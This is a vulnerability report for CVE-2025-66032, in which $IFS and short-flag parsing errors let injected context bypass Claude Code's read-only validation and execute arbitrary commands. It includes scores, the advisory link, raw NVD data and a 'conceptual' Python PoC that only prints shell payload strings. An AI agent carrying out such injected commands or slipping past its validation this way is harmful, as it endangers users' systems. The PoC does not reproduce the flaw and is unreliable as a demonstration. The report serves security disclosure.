Security Vulnerability Report
CVE-2025-66032 CVSS 9.8 CRITICAL

CVE-2025-66032

Published: 2025-12-03 19:15:58
Last Modified: 2025-12-05 16:29:42

Description

Claude Code is an agentic coding tool. Prior to 1.0.93, errors in parsing shell commands related to $IFS and short CLI flags made it possible to bypass the Claude Code read-only validation and trigger arbitrary code execution. Reliably exploiting this requires the ability to add untrusted content into a Claude Code context window. This vulnerability is fixed in 1.0.93.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:* - VULNERABLE
Claude Code < 1.0.93

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66032 PoC - Claude Code RCE via IFS/CLI flag bypass
# This PoC demonstrates the vulnerability concept
# Note: Requires ability to inject content into Claude Code context
import subprocess
import sys


def demonstrate_vulnerability():
    """
    Demonstrates the IFS and CLI flag parsing bypass technique.
    This is a conceptual PoC - actual exploitation requires Claude Code context.
    """
    # The payload strings below are only printed; nothing is executed.
    # Example attack vectors that bypass read-only validation:
    # 1. Using $IFS to inject commands
    payload_ifs = "echo test; whoami #"
    # 2. Short CLI flag manipulation
    payload_cli = "-c 'echo vulnerable'"
    # 3. Combined exploitation
    combined_payload = "$IFS/bin/sh$IFS-c$IFS'id'"

    print("[*] CVE-2025-66032 - Claude Code RCE PoC")
    print("[*] Payload type: IFS bypass")
    print(f"[*] Demonstrating: {payload_ifs}")

    # In actual exploitation:
    # 1. Attacker injects malicious content into Claude Code context
    # 2. Claude Code's parser misinterprets $IFS as safe
    # 3. Shell interprets special characters, executing arbitrary commands
    # 4. Bypasses read-only validation by exploiting parsing discrepancy
    return True


if __name__ == "__main__":
    demonstrate_vulnerability()

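References

https://github.com/anthropics/claude-code/security/advisories/GHSA-xq4m-mc3c-vvg3 (Vendor Advisory)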

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66032", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:57.527", "lastModified": "2025-12-05T16:29:42.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Claude Code is an agentic coding tool. Prior to 1.0.93, Due to errors in parsing shell commands related to $IFS and short CLI flags, it was possible to bypass the Claude Code read-only validation and trigger arbitrary code execution. Reliably exploiting this requires the ability to add untrusted content into a Claude Code context window. This vulnerability is fixed in 1.0.93."}, {"lang": "es", "value": "Claude Code es una herramienta de codificación agéntica. Versiones anteriores a la 1.0.93, debido a errores en el análisis de comandos de shell relacionados con $IFS y flags CLI cortos, era posible eludir la validación de solo lectura de Claude Code y desencadenar la ejecución de código arbitrario. Explotar esto de forma fiable requiere la capacidad de añadir contenido no confiable en una ventana de contexto de Claude Code. 
Esta vulnerabilidad está corregida en la 1.0.93."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.0.93", "matchCriteriaId": "E73D014A-196B-4DDC-AE9D-56279B7BD89A"}]}]}], "references": [{"url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-xq4m-mc3c-vvg3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}